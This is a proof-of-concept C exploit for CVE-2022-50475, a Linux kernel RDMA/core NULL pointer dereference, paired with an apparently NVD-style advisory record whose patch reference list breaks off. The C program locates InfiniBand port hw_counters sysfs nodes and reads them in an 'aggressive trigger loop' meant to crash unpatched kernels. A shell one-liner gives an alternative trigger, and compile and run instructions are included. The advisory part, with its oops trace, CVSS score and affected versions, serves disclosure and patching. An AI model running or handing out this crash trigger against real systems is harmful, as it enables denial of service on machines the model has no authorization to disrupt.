CVE-2022-50475

// CVE-2022-50475 PoC - Trigger NULL pointer dereference via sysfs access // This PoC triggers the vulnerability by accessing RDMA port sysfs nodes // while the ib_port structure is in an invalid state. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> // Find RDMA device ports in sysfs int find_rdma_ports(char paths[][256], int max_paths) { DIR *dir, *subdir; struct dirent *entry, *subentry; char base_path[] = "/sys/class/infiniband"; int count = 0; dir = opendir(base_path); if (!dir) { perror("Cannot open /sys/class/infiniband - RDMA not available"); return -1; } // Iterate through RDMA devices while ((entry = readdir(dir)) != NULL && count < max_paths) { if (entry->d_name[0] == '.') continue; char dev_path[256]; snprintf(dev_path, sizeof(dev_path), "%s/%s/ports", base_path, entry->d_name); subdir = opendir(dev_path); if (!subdir) continue; // Iterate through ports of each device while ((subentry = readdir(subdir)) != NULL && count < max_paths) { if (subentry->d_name[0] == '.') continue; snprintf(paths[count], 256, "%s/%s/hw_counters", dev_path, subentry->d_name); count++; } closedir(subdir); } closedir(dir); return count; } // Trigger the vulnerability by reading hw_counters sysfs node int trigger_crash(const char *path) { int fd; char buf[4096]; ssize_t ret; printf("[*] Accessing: %s\n", path); fd = open(path, O_RDONLY); if (fd < 0) { printf("[-] Cannot open %s: %s\n", path, strerror(errno)); return -1; } // Reading triggers hw_stat_port_show -> NULL pointer dereference ret = read(fd, buf, sizeof(buf) - 1); close(fd); if (ret < 0) { printf("[+] Read failed (expected if kernel crashed): %s\n", strerror(errno)); return 0; } printf("[+] Read %zd bytes successfully\n", ret); return 0; } int main(int argc, char *argv[]) { char paths[16][256]; int num_ports, i; printf("=== CVE-2022-50475 PoC ===\n"); printf("Linux Kernel RDMA/core NULL Pointer Dereference\n\n"); num_ports = find_rdma_ports(paths, 16); if (num_ports <= 0) { printf("[-] No RDMA ports found. Need RDMA-capable hardware.\n"); printf("[-] Example: Mellanox ConnectX-5/BlueField SoC with mlx5_ib\n"); return 1; } printf("[*] Found %d RDMA port(s)\n\n", num_ports); // Repeatedly access sysfs nodes to trigger race condition / crash for (i = 0; i < num_ports; i++) { trigger_crash(paths[i]); } // Aggressive loop to maximize chance of hitting the race window printf("\n[*] Entering aggressive trigger loop...\n"); for (int round = 0; round < 100; round++) { for (i = 0; i < num_ports; i++) { trigger_crash(paths[i]); } usleep(1000); } printf("\n[*] Done. If kernel didn't crash, timing window was missed.\n"); return 0; } // Alternative shell-only trigger: // for i in $(seq 1 1000); do // cat /sys/class/infiniband/*/ports/*/hw_counters 2>/dev/null // done // // Compile: gcc -o poc poc.c // Run: ./poc (requires RDMA hardware and unpatched kernel)

{"cve": {"id": "CVE-2022-50475", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:44.050", "lastModified": "2026-01-23T16:36:59.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Make sure \"ib_port\" is valid when access sysfs node\n\nThe \"ib_port\" structure must be set before adding the sysfs kobject,\nand reset after removing it, otherwise it may crash when accessing\nthe sysfs node:\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000050\n Mem abort info:\n ESR = 0x96000006\n Exception class = DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n Data abort info:\n ISV = 0, ISS = 0x00000006\n CM = 0, WnR = 0\n user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000e85f5ba5\n [0000000000000050] pgd=0000000848fd9003, pud=000000085b387003, pmd=0000000000000000\n Internal error: Oops: 96000006 [#2] PREEMPT SMP\n Modules linked in: ib_umad(O) mlx5_ib(O) nfnetlink_cttimeout(E) nfnetlink(E) act_gact(E) cls_flower(E) sch_ingress(E) openvswitch(E) nsh(E) nf_nat_ipv6(E) nf_nat_ipv4(E) nf_conncount(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) mst_pciconf(O) ipmi_devintf(E) ipmi_msghandler(E) ipmb_dev_int(OE) mlx5_core(O) mlxfw(O) mlxdevm(O) auxiliary(O) ib_uverbs(O) ib_core(O) mlx_compat(O) psample(E) sbsa_gwdt(E) uio_pdrv_genirq(E) uio(E) mlxbf_pmc(OE) mlxbf_gige(OE) mlxbf_tmfifo(OE) gpio_mlxbf2(OE) pwr_mlxbf(OE) mlx_trio(OE) i2c_mlxbf(OE) mlx_bootctl(OE) bluefield_edac(OE) knem(O) ip_tables(E) ipv6(E) crc_ccitt(E) [last unloaded: mst_pci]\n Process grep (pid: 3372, stack limit = 0x0000000022055c92)\n CPU: 5 PID: 3372 Comm: grep Tainted: G D OE 4.19.161-mlnx.47.gadcd9e3 #1\n Hardware name: https://www.mellanox.com BlueField SoC/BlueField SoC, BIOS BlueField:3.9.2-15-ga2403ab Sep 8 2022\n pstate: 40000005 (nZcv daif -PAN -UAO)\n pc : hw_stat_port_show+0x4c/0x80 [ib_core]\n lr : port_attr_show+0x40/0x58 [ib_core]\n sp : ffff000029f43b50\n x29: ffff000029f43b50 x28: 0000000019375000\n x27: ffff8007b821a540 x26: ffff000029f43e30\n x25: 0000000000008000 x24: ffff000000eaa958\n x23: 0000000000001000 x22: ffff8007a4ce3000\n x21: ffff8007baff8000 x20: ffff8007b9066ac0\n x19: ffff8007bae97578 x18: 0000000000000000\n x17: 0000000000000000 x16: 0000000000000000\n x15: 0000000000000000 x14: 0000000000000000\n x13: 0000000000000000 x12: 0000000000000000\n x11: 0000000000000000 x10: 0000000000000000\n x9 : 0000000000000000 x8 : ffff8007a4ce4000\n x7 : 0000000000000000 x6 : 000000000000003f\n x5 : ffff000000e6a280 x4 : ffff8007a4ce3000\n x3 : 0000000000000000 x2 : aaaaaaaaaaaaaaab\n x1 : ffff8007b9066a10 x0 : ffff8007baff8000\n Call trace:\n hw_stat_port_show+0x4c/0x80 [ib_core]\n port_attr_show+0x40/0x58 [ib_core]\n sysfs_kf_seq_show+0x8c/0x150\n kernfs_seq_show+0x44/0x50\n seq_read+0x1b4/0x45c\n kernfs_fop_read+0x148/0x1d8\n __vfs_read+0x58/0x180\n vfs_read+0x94/0x154\n ksys_read+0x68/0xd8\n __arm64_sys_read+0x28/0x34\n el0_svc_common+0x88/0x18c\n el0_svc_handler+0x78/0x94\n el0_svc+0x8/0xe8\n Code: f2955562 aa1603e4 aa1503e0 f9405683 (f9402861)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.14", "versionEndExcluding": "5.15.86", "matchCriteriaId": "F3E497F0-212B-43AB-AFFF-C929EE6B5670"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5e15ff29b156bbbdeadae230c8ecd5ecd8ca2477", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ac7a7d7079124f46180714b2d41a1703d37101bb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cd06d32a71fbb198b2d43dddf7 ... (truncated)